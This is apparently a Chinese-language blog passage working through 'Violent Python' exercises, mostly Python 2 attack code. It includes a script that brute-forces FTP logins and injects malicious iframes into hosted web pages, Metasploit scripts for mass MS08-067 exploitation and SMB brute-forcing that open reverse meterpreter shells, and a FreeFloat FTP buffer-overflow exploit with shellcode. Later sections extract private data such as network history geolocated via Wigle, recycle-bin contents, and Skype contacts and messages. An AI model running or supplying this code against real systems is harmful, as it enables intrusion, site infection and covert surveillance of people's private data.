username = raw_input('[*]Username >>> ')
password = raw_input('[*]Password >>> ')
redirect = raw_input('[*]Redirect >>> ')
print
try:
ftp = ftplib.FTP(host)
ftp.login(username,password)
injectPage(ftp,'index.html',redirect)
except:
print '[-] Logon failed.'
if __name__ == '__main__':
main()
运行结果:
这里将上面几个小节的代码整合到一块,主要是添加了attack()函数,该函数首先用用户名和密码登陆FTP服务器,然后调用其他函数搜索默认网页并下载同时实现注入和上传,其实说白了这个函数就是将前面几个小节的函数整合起来调用。
#!/usr/bin/python
#coding=utf-8
import ftplib
import optparse
import time
def attack(username,password,tgtHost,redirect):
ftp = ftplib.FTP(tgtHost)
ftp.login(username,password)
defPages = returnDefault(ftp)
for defPage in defPages:
injectPage(ftp,defPage,redirect)
def anonLogin(hostname):
try:
ftp = ftplib.FTP(hostname)
ftp.login('anonymous','[email protected]')
print '\n[*] ' + str(hostname) + ' FTP Anonymous Logon Succeeded.'
ftp.quit()
return True
except Exception, e:
print '\n[-] ' + str(hostname) + ' FTP Anonymous Logon Failed.'
return False
def bruteLogin(hostname,passwdFile):
pF = open(passwdFile,'r')
for line in pF.readlines():
username = line.split(':')[0]
password = line.split(':')[1].strip('\r').strip('\n')
print '[+] Trying: ' + username + '/' + password
try:
ftp = ftplib.FTP(hostname)
ftp.login(username,password)
print '\n[*] ' + str(hostname) + ' FTP Logon Succeeded: ' + username + '/' + password
ftp.quit()
return (username,password)
except Exception, e:
pass
print '\n[-] Could not brubrute force FTP credentials.'
return (None,None)
def returnDefault(ftp):
try:
#nlst()方法获取目录下的文件
dirList = ftp.nlst()
except:
dirList = []
print '[-] Could not list directory contents.'
print '[-] Skipping To Next Target.'
return
retList = []
for filename in dirList:
#lower()方法将文件名都转换为小写的形式
fn = filename.lower()
if '.php' in fn or '.asp' in fn or '.htm' in fn:
print '[+] Found default page: '+filename
retList.append(filename)
return retList
def injectPage(ftp,page,redirect):
f = open(page + '.tmp','w')
#下载FTP文件
ftp.retrlines('RETR ' + page,f.write)
print '[+] Downloaded Page: ' + page
f.write(redirect)
f.close()
print '[+] Injected Malicious IFrame on: ' + page
#上传目标文件
ftp.storlines('STOR ' + page,open(page + '.tmp'))
print '[+] Uploaded Injected Page: ' + page
def main():
parser = optparse.OptionParser('[*] Usage : ./massCompromise.py -H -r -f ]')
parser.add_option('-H',dest='hosts',type='string',help='specify target host')
parser.add_option('-r',dest='redirect',type='string',help='specify redirect page')
parser.add_option('-f',dest='file',type='string',help='specify userpass file')
(options,args) = parser.parse_args()
#返回hosts列表,若不加split()则只返回一个字符
hosts = str(options.hosts).split(',')
redirect = options.redirect
file = options.file
#先不用判断用户口令文件名是否输入,因为会先进行匿名登录尝试
if hosts == None or redirect == None:
print parser.usage
exit(0)
for host in hosts:
username = None
password = None
if anonLogin(host) == True:
username = 'anonymous'
password = '[email protected]'
print '[+] Using Anonymous Creds to attack'
attack(username,password,host,redirect)
elif file != None:
(username,password) = bruteLogin(host,file)
if password != None:
print '[+] Using Cred: ' + username + '/' + password + ' to attack'
attack(username,password,host,redirect)
if __name__ == '__main__':
main()
运行结果:
由于可以匿名登录所以可以直接进行注入攻击。
【个人修改的代码】
但是发现就是匿名登录进去的文件都只是属于匿名用户自己的而没有ftpuser即正常的FTP用户的文件,所以为了实现同时进行注入就稍微修改了一下代码:
#!/usr/bin/python
#coding=utf-8
import ftplib
import optparse
import time
def attack(username,password,tgtHost,redirect):
ftp = ftplib.FTP(tgtHost)
ftp.login(username,password)
defPages = returnDefault(ftp)
for defPage in defPages:
injectPage(ftp,defPage,redirect)
def anonLogin(hostname):
try:
ftp = ftplib.FTP(hostname)
ftp.login('anonymous','[email protected]')
print '\n[*] ' + str(hostname) + ' FTP Anonymous Logon Succeeded.'
ftp.quit()
return True
except Exception, e:
print '\n[-] ' + str(hostname) + ' FTP Anonymous Logon Failed.'
return False
def bruteLogin(hostname,passwdFile):
pF = open(passwdFile,'r')
for line in pF.readlines():
username = line.split(':')[0]
password = line.split(':')[1].strip('\r').strip('\n')
print '[+] Trying: ' + username + '/' + password
try:
ftp = ftplib.FTP(hostname)
ftp.login(username,password)
print '\n[*] ' + str(hostname) + ' FTP Logon Succeeded: ' + username + '/' + password
ftp.quit()
return (username,password)
except Exception, e:
pass
print '\n[-] Could not brubrute force FTP credentials.'
return (None,None)
def returnDefault(ftp):
try:
#nlst()方法获取目录下的文件
dirList = ftp.nlst()
except:
dirList = []
print '[-] Could not list directory contents.'
print '[-] Skipping To Next Target.'
return
retList = []
for filename in dirList:
#lower()方法将文件名都转换为小写的形式
fn = filename.lower()
if '.php' in fn or '.asp' in fn or '.htm' in fn:
print '[+] Found default page: '+filename
retList.append(filename)
return retList
def injectPage(ftp,page,redirect):
f = open(page + '.tmp','w')
#下载FTP文件
ftp.retrlines('RETR ' + page,f.write)
print '[+] Downloaded Page: ' + page
f.write(redirect)
f.close()
print '[+] Injected Malicious IFrame on: ' + page
#上传目标文件
ftp.storlines('STOR ' + page,open(page + '.tmp'))
print '[+] Uploaded Injected Page: ' + page
def main():
parser = optparse.OptionParser('[*] Usage : ./massCompromise.py -H -r -f ]')
parser.add_option('-H',dest='hosts',type='string',help='specify target host')
parser.add_option('-r',dest='redirect',type='string',help='specify redirect page')
parser.add_option('-f',dest='file',type='string',help='specify userpass file')
(options,args) = parser.parse_args()
#返回hosts列表,若不加split()则只返回一个字符
hosts = str(options.hosts).split(',')
redirect = options.redirect
file = options.file
#先不用判断用户口令文件名是否输入,因为先进行匿名登录尝试
if hosts == None or redirect == None:
print parser.usage
exit(0)
for host in hosts:
username = None
password = None
if anonLogin(host) == True:
username = 'anonymous'
password = '[email protected]'
print '[+] Using Anonymous Creds to attack'
attack(username,password,host,redirect)
if file != None:
(username,password) = bruteLogin(host,file)
if password != None:
print '[+] Using Cred: ' + username + '/' + password + ' to attack'
attack(username,password,host,redirect)
if __name__ == '__main__':
main()
运行结果:
可以发现两个用户中发现的文件是不一样的。
在密码攻击的口令列表中值得拥有的11个口令:
aaa
academia
anything
coffee
computer
cookie
oracle
password
secret
super
unknown
这里主要利用了MS08-067的这个漏洞来进行演示
将下面的命令保存为conficker.rc文件:
use exploit/windows/smb/ms08_067_netapi
set RHOST 10.10.10.123
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.10.10.160
set LPORT 7777
exploit -j -z
这里exploit命令的-j参数表示攻击在后台进行,-z参数表示攻击完成后不与会话进行交互。
接着输入命令:msfconsole -r conficker.rc
获得一个会话session1之后,然后打开这个session:
这样就能通过打开文件读取其中命令的方式来执行msf相应的操作,从而获取了XP的shell。
导入nmap库,在findTgts()函数中实现对整个网段的主机445端口的扫描,setupHandler()函数实现目标主机被攻击后进行远程交互的监听器的功能,confickerExploit()函数实现上一小节中conficker.rc脚本中一样的内容:
#!/usr/bin/python
#coding=utf-8
import nmap
def findTgts(subNet):
nmScan = nmap.PortScanner()
nmScan.scan(subNet,'445')
tgtHosts = []
for host in nmScan.all_hosts():
#若目标主机存在TCP的445端口
if nmScan[host].has_tcp(445):
state = nmScan[host]['tcp'][445]['state']
#并且445端口是开启的
if state == 'open':
print '[+] Found Target Host: ' + host
tgtHosts.append(host)
return tgtHosts
def setupHandler(configFile,lhost,lport):
configFile.write('use exploit/multi/handler\n')
configFile.write('set PAYLOAD windows/meterpreter/reverse_tcp\n')
configFile.write('set LPORT ' + str(lport) + '\n')
configFile.write('set LHOST ' + lhost + '\n')
configFile.write('exploit -j -z\n')
#设置全局变量DisablePayloadHandler,让已经新建一个监听器之后,后面的所有的主机不会重复新建监听器
#其中setg为设置全局参数
configFile.write('setg DisablePayloadHandler 1\n')
def confickerExploit(configFile,tgtHost,lhost,lport):
configFile.write('use exploit/windows/smb/ms08_067_netapi\n')
configFile.write('set RHOST ' + str(tgtHost) + '\n')
configFile.write('set PAYLOAD windows/meterpreter/reverse_tcp\n')
configFile.write('set LPORT ' + str(lport) + '\n')
configFile.write('set LHOST ' + lhost + '\n')
#-j参数表示攻击在后台进行,-z参数表示攻击完成后不与会话进行交互
configFile.write('exploit -j -z\n')
注意点就是,在confickerExploit()函数中,脚本发送了一条指令在同一个任务(job)的上下文环境中(-j),不与任务进行即时交互的条件下(-z)利用对目标主机上的漏洞。因为这个脚本是实现批量式操作的,即会渗透多个目标主机,因而不可能同时与各个主机进行交互而必须使用-j和-z参数。
这里暴力破解SMB用户名/密码,以此来获取权限在目标主机上远程执行一个进程(psexec),将用户名设为Administrator,然后打开密码列表文件,对文件中的每个密码都会生成一个远程执行进行的Metasploit脚本,若密码正确则会返回一个命令行shell:
def smbBrute(configFile,tgtHost,passwdFile,lhost,lport):
username = 'Administrator'
pF = open(passwdFile,'r')
for password in pF.readlines():
password = password.strip('\n').strip('\r')
configFile.write('use exploit/windows/smb/psexec\n')
configFile.write('set SMBUser ' + str(username) + '\n')
configFile.write('set SMBPass ' + str(password) + '\n')
configFile.write('set RHOST ' + str(tgtHost) + '\n')
configFile.write('set PAYLOAD windows/meterpreter/reverse_tcp\n')
configFile.write('set LPORT ' + str(lport) + '\n')
configFile.write('set LHOST ' + lhost + '\n')
configFile.write('exploit -j -z\n')
#!/usr/bin/python
#coding=utf-8
import nmap
import os
import optparse
import sys
def findTgts(subNet):
nmScan = nmap.PortScanner()
nmScan.scan(subNet,'445')
tgtHosts = []
for host in nmScan.all_hosts():
#若目标主机存在TCP的445端口
if nmScan[host].has_tcp(445):
state = nmScan[host]['tcp'][445]['state']
#并且445端口是开启的
if state == 'open':
print '[+] Found Target Host: ' + host
tgtHosts.append(host)
return tgtHosts
def setupHandler(configFile,lhost,lport):
configFile.write('use exploit/multi/handler\n')
configFile.write('set PAYLOAD windows/meterpreter/reverse_tcp\n')
configFile.write('set LPORT ' + str(lport) + '\n')
configFile.write('set LHOST ' + lhost + '\n')
configFile.write('exploit -j -z\n')
#设置全局变量DisablePayloadHandler,让已经新建一个监听器之后,后面的所有的主机不会重复新建监听器
#其中setg为设置全局参数
configFile.write('setg DisablePayloadHandler 1\n')
def confickerExploit(configFile,tgtHost,lhost,lport):
configFile.write('use exploit/windows/smb/ms08_067_netapi\n')
configFile.write('set RHOST ' + str(tgtHost) + '\n')
configFile.write('set PAYLOAD windows/meterpreter/reverse_tcp\n')
configFile.write('set LPORT ' + str(lport) + '\n')
configFile.write('set LHOST ' + lhost + '\n')
#-j参数表示攻击在后台进行,-z参数表示攻击完成后不与会话进行交互
configFile.write('exploit -j -z\n')
def smbBrute(configFile,tgtHost,passwdFile,lhost,lport):
username = 'Administrator'
pF = open(passwdFile,'r')
for password in pF.readlines():
password = password.strip('\n').strip('\r')
configFile.write('use exploit/windows/smb/psexec\n')
configFile.write('set SMBUser ' + str(username) + '\n')
configFile.write('set SMBPass ' + str(password) + '\n')
configFile.write('set RHOST ' + str(tgtHost) + '\n')
configFile.write('set PAYLOAD windows/meterpreter/reverse_tcp\n')
configFile.write('set LPORT ' + str(lport) + '\n')
configFile.write('set LHOST ' + lhost + '\n')
configFile.write('exploit -j -z\n')
def main():
configFile = open('meta.rc','w')
parser = optparse.OptionParser('[*] Usage : ./conficker.py -H -l [-p -F ]')
parser.add_option('-H',dest='tgtHost',type='string',help='specify the target host[s]')
parser.add_option('-l',dest='lhost',type='string',help='specify the listen host')
parser.add_option('-p',dest='lport',type='string',help='specify the listen port')
parser.add_option('-F',dest='passwdFile',type='string',help='specify the password file')
(options,args)=parser.parse_args()
if (options.tgtHost == None) | (options.lhost == None):
print parser.usage
exit(0)
lhost = options.lhost
lport = options.lport
if lport == None:
lport = '1337'
passwdFile = options.passwdFile
tgtHosts = findTgts(options.tgtHost)
setupHandler(configFile,lhost,lport)
for tgtHost in tgtHosts:
confickerExploit(configFile,tgtHost,lhost,lport)
if passwdFile != None:
smbBrute(configFile,tgtHost,passwdFile,lhost,lport)
configFile.close()
os.system('msfconsole -r meta.rc')
if __name__ == '__main__':
main()
运行结果:
首先在shellcode变量中写入msf框架生成的载荷和十六进制代码;然后在overflow变量中写入246个字母A(十六进制值为\x41),接着让ret变量指向kernel32.dll中的一个含有把控制流直接跳转到栈顶部的指令的地址;padding变量中是150个NOP指令,构成NOP链;最后把所有变量组合在一起形成crash变量:
#!/usr/bin/python
#coding=utf-8
shellcode = ("\xbf\x5c\x2a\x11\xb3\xd9\xe5\xd9\x74\x24\xf4\x5d\x33\xc9"
"\xb1\x56\x83\xc5\x04\x31\x7d\x0f\x03\x7d\x53\xc8\xe4\x4f"
"\x83\x85\x07\xb0\x53\xf6\x8e\x55\x62\x24\xf4\x1e\xd6\xf8"
"\x7e\x72\xda\x73\xd2\x67\x69\xf1\xfb\x88\xda\xbc\xdd\xa7"
"\xdb\x70\xe2\x64\x1f\x12\x9e\x76\x73\xf4\x9f\xb8\x86\xf5"
"\xd8\xa5\x68\xa7\xb1\xa2\xda\x58\xb5\xf7\xe6\x59\x19\x7c"
"\x56\x22\x1c\x43\x22\x98\x1f\x94\x9a\x97\x68\x0c\x91\xf0"
"\x48\x2d\x76\xe3\xb5\x64\xf3\xd0\x4e\x77\xd5\x28\xae\x49"
"\x19\xe6\x91\x65\x94\xf6\xd6\x42\x46\x8d\x2c\xb1\xfb\x96"
"\xf6\xcb\x27\x12\xeb\x6c\xac\x84\xcf\x8d\x61\x52\x9b\x82"
"\xce\x10\xc3\x86\xd1\xf5\x7f\xb2\x5a\xf8\xaf\x32\x18\xdf"
"\x6b\x1e\xfb\x7e\x2d\xfa\xaa\x7f\x2d\xa2\x13\xda\x25\x41"
"\x40\x5c\x64\x0e\xa5\x53\x97\xce\xa1\xe4\xe4\xfc\x6e\x5f"
"\x63\x4d\xe7\x79\x74\xb2\xd2\x3e\xea\x4d\xdc\x3e\x22\x8a"
"\x88\x6e\x5c\x3b\xb0\xe4\x9c\xc4\x65\xaa\xcc\x6a\xd5\x0b"
"\xbd\xca\x85\xe3\xd7\xc4\xfa\x14\xd8\x0e\x8d\x12\x16\x6a"
"\xde\xf4\x5b\x8c\xf1\x58\xd5\x6a\x9b\x70\xb3\x25\x33\xb3"
"\xe0\xfd\xa4\xcc\xc2\x51\x7d\x5b\x5a\xbc\xb9\x64\x5b\xea"
"\xea\xc9\xf3\x7d\x78\x02\xc0\x9c\x7f\x0f\x60\xd6\xb8\xd8"
"\xfa\x86\x0b\x78\xfa\x82\xfb\x19\x69\x49\xfb\x54\x92\xc6"
"\xac\x31\x64\x1f\x38\xac\xdf\x89\x5e\x2d\xb9\xf2\xda\xea"
"\x7a\xfc\xe3\x7f\xc6\xda\xf3\xb9\xc7\x66\xa7\x15\x9e\x30"
"\x11\xd0\x48\xf3\xcb\x8a\x27\x5d\x9b\x4b\x04\x5e\xdd\x53"
"\x41\x28\x01\xe5\x3c\x6d\x3e\xca\xa8\x79\x47\x36\x49\x85"
"\x92\xf2\x79\xcc\xbe\x53\x12\x89\x2b\xe6\x7f\x2a\x86\x25"
"\x86\xa9\x22\xd6\x7d\xb1\x47\xd3\x3a\x75\xb4\xa9\x53\x10"
"\xba\x1e\x53\x31")
overflow = "\x41" * 246
ret = struct.pack('
其中padding为在shellcode之前的一系列NOP(无操作)指令,使攻击者预估直接跳转到那里去的地址时,能放宽的精度要求。只要它跳转到NOP链的任意地方,都会直接滑到shellc中去。
使用socket与目标主机的TCP 21端口创建一个连接,若连接成功则匿名登录主机,最后发送FTP命令RETR,其后面接上crash变量,由于受影响的程序无法正确检查用户输入,因而会引发基于栈的缓冲区溢出,会覆盖EIP寄存器从而使程序直接跳转到shellcode中并执行:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect((target, 21))
except:
print "[-] Connection to " + target + " failed!"
sys.exit(0)
print "[*] Sending " + 'len(crash)' + " " + command + " byte crash..."
s.send("USER anonymous\r\n")
s.recv(1024)
s.send("PASS \r\n")
s.recv(1024)
s.send("RETR" + " " + crash + "\r\n")
time.sleep(4)
需要下载能运行在XP上的FreeFloat FTP软件,然后就可以进行测试了:
#!/usr/bin/python
#coding=utf-8
import socket
import sys
import time
import struct
if len(sys.argv) < 2:
print "[-] Usage: %s " % sys.argv[0] + "\r"
print "[-] For example [filename.py 192.168.1.10 PWND] would do the trick."
print "[-] Other options: AUTH, APPE, ALLO, ACCT"
sys.exit(0)
target = sys.argv[1]
command = sys.argv[2]
if len(sys.argv) > 2:
platform = sys.argv[2]
#./msfpayload windows/shell_bind_tcp r | ./msfencode -e x86/shikata_ga_nai -b "\x00\xff\x0d\x0a\x3d\x20"
#[*] x86/shikata_ga_nai succeeded with size 368 (iteration=1)
shellcode = ("\xbf\x5c\x2a\x11\xb3\xd9\xe5\xd9\x74\x24\xf4\x5d\x33\xc9"
"\xb1\x56\x83\xc5\x04\x31\x7d\x0f\x03\x7d\x53\xc8\xe4\x4f"
"\x83\x85\x07\xb0\x53\xf6\x8e\x55\x62\x24\xf4\x1e\xd6\xf8"
"\x7e\x72\xda\x73\xd2\x67\x69\xf1\xfb\x88\xda\xbc\xdd\xa7"
"\xdb\x70\xe2\x64\x1f\x12\x9e\x76\x73\xf4\x9f\xb8\x86\xf5"
"\xd8\xa5\x68\xa7\xb1\xa2\xda\x58\xb5\xf7\xe6\x59\x19\x7c"
"\x56\x22\x1c\x43\x22\x98\x1f\x94\x9a\x97\x68\x0c\x91\xf0"
"\x48\x2d\x76\xe3\xb5\x64\xf3\xd0\x4e\x77\xd5\x28\xae\x49"
"\x19\xe6\x91\x65\x94\xf6\xd6\x42\x46\x8d\x2c\xb1\xfb\x96"
"\xf6\xcb\x27\x12\xeb\x6c\xac\x84\xcf\x8d\x61\x52\x9b\x82"
"\xce\x10\xc3\x86\xd1\xf5\x7f\xb2\x5a\xf8\xaf\x32\x18\xdf"
"\x6b\x1e\xfb\x7e\x2d\xfa\xaa\x7f\x2d\xa2\x13\xda\x25\x41"
"\x40\x5c\x64\x0e\xa5\x53\x97\xce\xa1\xe4\xe4\xfc\x6e\x5f"
"\x63\x4d\xe7\x79\x74\xb2\xd2\x3e\xea\x4d\xdc\x3e\x22\x8a"
"\x88\x6e\x5c\x3b\xb0\xe4\x9c\xc4\x65\xaa\xcc\x6a\xd5\x0b"
"\xbd\xca\x85\xe3\xd7\xc4\xfa\x14\xd8\x0e\x8d\x12\x16\x6a"
"\xde\xf4\x5b\x8c\xf1\x58\xd5\x6a\x9b\x70\xb3\x25\x33\xb3"
"\xe0\xfd\xa4\xcc\xc2\x51\x7d\x5b\x5a\xbc\xb9\x64\x5b\xea"
"\xea\xc9\xf3\x7d\x78\x02\xc0\x9c\x7f\x0f\x60\xd6\xb8\xd8"
"\xfa\x86\x0b\x78\xfa\x82\xfb\x19\x69\x49\xfb\x54\x92\xc6"
"\xac\x31\x64\x1f\x38\xac\xdf\x89\x5e\x2d\xb9\xf2\xda\xea"
"\x7a\xfc\xe3\x7f\xc6\xda\xf3\xb9\xc7\x66\xa7\x15\x9e\x30"
"\x11\xd0\x48\xf3\xcb\x8a\x27\x5d\x9b\x4b\x04\x5e\xdd\x53"
"\x41\x28\x01\xe5\x3c\x6d\x3e\xca\xa8\x79\x47\x36\x49\x85"
"\x92\xf2\x79\xcc\xbe\x53\x12\x89\x2b\xe6\x7f\x2a\x86\x25"
"\x86\xa9\x22\xd6\x7d\xb1\x47\xd3\x3a\x75\xb4\xa9\x53\x10"
"\xba\x1e\x53\x31")
#7C874413 FFE4 JMP ESP kernel32.dll
overflow = "\x41" * 246
ret = struct.pack('
以管理员权限开启cmd,输入如下命令来列出每个网络显示出profile Guid对网络的描述、网络名和网关的MAC地址:
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\
CurrentVersion\NetworkList\Signatures\Unmanaged" /s
这里需要用到Python的_winreg库,在Windows版是默认安装好的。
连上注册表后,使用OpenKey()函数打开相关的键,在循环中依次分析该键下存储的所有网络network profile,其中FirstNetwork网络名和DefaultGateway默认网关的Mac地址的键值打印出来。
#!/usr/bin/python
#coding=utf-8
from _winreg import *
# 将REG_BINARY值转换成一个实际的Mac地址
def val2addr(val):
addr = ""
for ch in val:
addr += ("%02x " % ord(ch))
addr = addr.strip(" ").replace(" ", ":")[0:17]
return addr
# 打印网络相关信息
def printNets():
net = "SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Signatures\Unmanaged"
key = OpenKey(HKEY_LOCAL_MACHINE, net)
print "\n[*]Networks You have Joined."
for i in range(100):
try:
guid = EnumKey(key, i)
netKey = OpenKey(key, str(guid))
(n, addr, t) = EnumValue(netKey, 5)
(n, name, t) = EnumValue(netKey, 4)
macAddr = val2addr(addr)
netName = name
print '[+] ' + netName + ' ' + macAddr
CloseKey(netKey)
except:
break
def main():
printNets()
if __name__ == '__main__':
main()
运行结果:
注意一点的是,是需要管理员权限开启cmd来执行脚本才行得通。
此处增加了对Wigle网站的访问并将Mac地址传递给Wigle来获取经纬度等物理地址信息。
#!/usr/bin/python
#coding=utf-8
from _winreg import *
import mechanize
import urllib
import re
import urlparse
import os
import optparse
# 将REG_BINARY值转换成一个实际的Mac地址
def val2addr(val):
addr = ""
for ch in val:
addr += ("%02x " % ord(ch))
addr = addr.strip(" ").replace(" ", ":")[0:17]
return addr
# 打印网络相关信息
def printNets(username, password):
net = "SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Signatures\Unmanaged"
key = OpenKey(HKEY_LOCAL_MACHINE, net)
print "\n[*]Networks You have Joined."
for i in range(100):
try:
guid = EnumKey(key, i)
netKey = OpenKey(key, str(guid))
(n, addr, t) = EnumValue(netKey, 5)
(n, name, t) = EnumValue(netKey, 4)
macAddr = val2addr(addr)
netName = name
print '[+] ' + netName + ' ' + macAddr
wiglePrint(username, password, macAddr)
CloseKey(netKey)
except:
break
# 通过wigle查找Mac地址对应的经纬度
def wiglePrint(username, password, netid):
browser = mechanize.Browser()
browser.open('http://wigle.net')
reqData = urllib.urlencode({'credential_0': username, 'credential_1': password})
browser.open('https://wigle.net/gps/gps/main/login', reqData)
params = {}
params['netid'] = netid
reqParams = urllib.urlencode(params)
respURL = 'http://wigle.net/gps/gps/main/confirmquery/'
resp = browser.open(respURL, reqParams).read()
mapLat = 'N/A'
mapLon = 'N/A'
rLat = re.findall(r'maplat=.*\&', resp)
if rLat:
mapLat = rLat[0].split('&')[0].split('=')[1]
rLon = re.findall(r'maplon=.*\&', resp)
if rLon:
mapLon = rLon[0].split
print '[-] Lat: ' + mapLat + ', Lon: ' + mapLon
def main():
parser = optparse.OptionParser('usage %prog ' + '-u -p ')
parser.add_option('-u', dest='username', type='string', help='specify wigle password')
parser.add_option('-p', dest='password', type='string', help='specify wigle username')
(options, args) = parser.parse_args()
username = options.username
password = options.password
if username == None or password == None:
print parser.usage
exit(0)
else:
printNets(username, password)
if __name__ == '__main__':
main()
运行结果:
看到只显示一条信息,且没有其物理地址相关信息,存在问题。
调试查看原因:
发现是网站的robots.txt文件禁止对该页面的请求因而无法访问。
Windows系统中的回收站是一个专门用来存放被删除文件的特殊文件夹。
子目录中的字符串表示的是用户的SID,对应机器里一个唯一的用户账户。
寻找被删除的文件/文件夹的函数:
#!/usr/bin/python
#coding=utf-8
import os
# 逐一测试回收站的目录是否存在,并返回第一个找到的回收站目录
def returnDir():
dirs=['C:\\Recycler\\', 'C:\\Recycled\\', 'C:\\$Recycle.Bin\\']
for recycleDir in dirs:
if os.path.isdir(recycleDir):
return recycleDir
return None
可以使用Windows注册表把SID转换成一个准确的用户名。
以管理员权限运行cmd并输入命令:
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-2595130515-3345905091-1839164762-1000" /s
代码如下:
#!/usr/bin/python
#coding=utf-8
import os
import optparse
from _winreg import *
# 逐一测试回收站的目录是否存在,并返回第一个找到的回收站目录
def returnDir():
dirs=['C:\\Recycler\\', 'C:\\Recycled\\', 'C:\\$Recycle.Bin\\']
for recycleDir in dirs:
if os.path.isdir(recycleDir):
return recycleDir
return None
# 操作注册表来获取相应目录属主的用户名
def sid2user(sid):
try:
key = OpenKey(HKEY_LOCAL_MACHINE, "SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList" + '\\' + sid)
(value, type) = QueryValueEx(key, 'ProfileImagePath')
user = value.split('\\')[-1]
return user
except:
return sid
def findRecycled(recycleDir):
dirList = os.listdir(recycleDir)
for sid in dirList:
files = os.listdir(recycleDir + sid)
user = sid2user(sid)
print '\n[*] Listing Files For User: ' + str(user)
for file in files:
print '[+] Found File: ' + str(file)
def main():
recycledDir = returnDir()
findRecycled(recycledDir)
if __name__ == '__main__':
main()
回收站的内容:
运行结果:
pyPdf是管理PDF文档的第三方Python库,在Kali中是已经默认安装了的就不需要再去下载安装。
#!/usr/bin/python
#coding=utf-8
import pyPdf
import optparse
from pyPdf import PdfFileReader
# 使用getDocumentInfo()函数提取PDF文档所有的元数据
def printMeta(fileName):
pdfFile = PdfFileReader(file(fileName, 'rb'))
docInfo = pdfFile.getDocumentInfo()
print "[*] PDF MeataData For: " + str(fileName)
for meraItem in docInfo:
print "[+] " + meraItem + ": " + docInfo[meraItem]
def main():
parser = optparse.OptionParser("[*]Usage: python pdfread.py -F ")
parser.add_option('-F', dest='fileName', type='string', help='specify PDF file name')
(options, args) = parser.parse_args()
fileName = options.fileName
if fileName == None:
print parser.usage
exit(0)
else:
printMeta(fileName)
if __name__ == '__main__':
main()
解析一个PDF文件的运行结果:
Exif,即exchange image file format交换图像文件格式,定义了如何存储图像和音频文件的标准。
import urllib2
from bs4 import BeautifulSoup as BS
from os.path import basename
from urlparse import urlsplit
# 通过BeautifulSoup查找URL中所有的img标签
def findImages(url):
print '[+] Finding images on ' + url
urlContent = urllib2.urlopen(url).read()
soup = BS(urlContent, 'lxml')
imgTags = soup.findAll('img')
return imgTags
# 通过img标签的src属性的值来获取图片URL下载图片
def downloadImage(imgTag):
try:
print '[+] Dowloading image...'
imgSrc = imgTag['src']
imgContent = urllib2.urlopen(imgSrc).read()
imgFileName = basename(urlsplit(imgSrc)[2])
imgFile = open(imgFileName, 'wb')
imgFile.write(imgContent)
imgFile.close()
return imgFileName
except:
return ' '
这里使用到Python的图形处理库PIL,在Kali中默认安装了。
这里查看下载图片的元数据中是否含有Exif标签“GPSInfo”,若存在则输出存在信息。
#!/usr/bin/python
#coding=utf-8
import optparse
from PIL import Image
from PIL.ExifTags import TAGS
import urllib2
from bs4 import BeautifulSoup as BS
from os.path import basename
from urlparse import urlsplit
# 通过BeautifulSoup查找URL中所有的img标签
def findImages(url):
print '[+] Finding images on ' + url
urlContent = urllib2.urlopen(url).read()
soup = BS(urlContent, 'lxml')
imgTags = soup.findAll('img')
return imgTags
# 通过img标签的src属性的值来获取图片URL下载图片
def downloadImage(imgTag):
try:
print '[+] Dowloading image...'
imgSrc = imgTag['src']
imgContent = urllib2.urlopen(imgSrc).read()
imgFileName = basename(urlsplit(imgSrc)[2])
imgFile = open(imgFileName, 'wb')
imgFile.write(imgContent)
imgFile.close()
return imgFileName
except:
return ' '
# 获取图像文件的元数据,并寻找是否存在Exif标签“GPSInfo”
def testForExif(imgFileName):
try:
exifData = {}
imgFile = Image.open(imgFileName)
info = imgFile._getexif()
if info:
for (tag, value) in info.items():
decoded = TAGS.get(tag, tag)
exifData[decoded] = value
exifGPS = exifData['GPSInfo']
if exifGPS:
print '[*] ' + imgFileName + ' contains GPS MetaData'
except:
pass
def main():
parser = optparse.OptionParser('[*]Usage: python Exif.py -u ')
parser.add_option('-u', dest='url', type='string', help='specify url address')
(options, args) = parser.parse_args()
url = options.url
if url == None:
print parser.usage
exit(0)
else:
imgTags = findImages(url)
for imgTag in imgTags:
imgFileName = downloadImage(imgTag)
testForExif(imgFileName)
if __name__ == '__main__':
main()
书中样例的网址为https://www.flickr.com/photos/dvids/4999001925/sizes/o
运行结果:
这里没有下载Skype聊天程序,感兴趣的自己下载测试即可。
#!/usr/bin/python
#coding=utf-8
import sqlite3
import optparse
import os
# 连接main.db数据库,申请游标,执行SQL语句并返回结果
def printProfile(skypeDB):
conn = sqlite3.connect(skypeDB)
c = conn.cursor()
c.execute("SELECT fullname, skypename, city, country, datetime(profile_timestamp,'unixepoch') FROM Accounts;")
for row in c:
print '[*] -- Found Account --'
print '[+] User : '+str(row[0])
print '[+] Skype Username : '+str(row[1])
print '[+] Location : '+str(row[2])+','+str(row[3])
print '[+] Profile Date : '+str(row[4])
# 获取联系人的相关信息
def printContacts(skypeDB):
conn = sqlite3.connect(skypeDB)
c = conn.cursor()
c.execute("SELECT displayname, skypename, city, country, phone_mobile, birthday FROM Contacts;")
for row in c:
print '\n[*] -- Found Contact --'
print '[+] User : ' + str(row[0])
print '[+] Skype Username : ' + str(row[1])
if str(row[2]) != '' and str(row[2]) != 'None':
print '[+] Location : ' + str(row[2]) + ',' + str(row[3])
if str(row[4]) != 'None':
print '[+] Mobile Number : ' + str(row[4])
if str(row[5]) != 'None':
print '[+] Birthday : ' + str(row[5])
def printCallLog(skypeDB):
conn = sqlite3.connect(skypeDB)
c = conn.cursor()
c.execute("SELECT datetime(begin_timestamp,'unixepoch'), identity FROM calls, conversations WHERE calls.conv_dbid = conversations.id;")
print '\n[*] -- Found Calls --'
for row in c:
print '[+] Time: ' + str(row[0]) + ' | Partner: ' + str(row[1])
def printMessages(skypeDB):
conn = sqlite3.connect(skypeDB)
c = conn.cursor()
c.execute("SELECT datetime(timestamp,'unixepoch'), dialog_partner, author, body_xml FROM Messages;")
print '\n[*] -- Found Messages --'
for row in c:
try:
if 'partlist' not in str(row[3]):
if str(row[1]) != str(row[2]):
msgDirection = 'To ' + str(row[1]) + ': '
else:
msgDirection = 'From ' + str(row[2]) + ' : '
print 'Time: ' + str(row[0]) + ' ' + msgDirection + str(row[3])
except:
pass
def main():
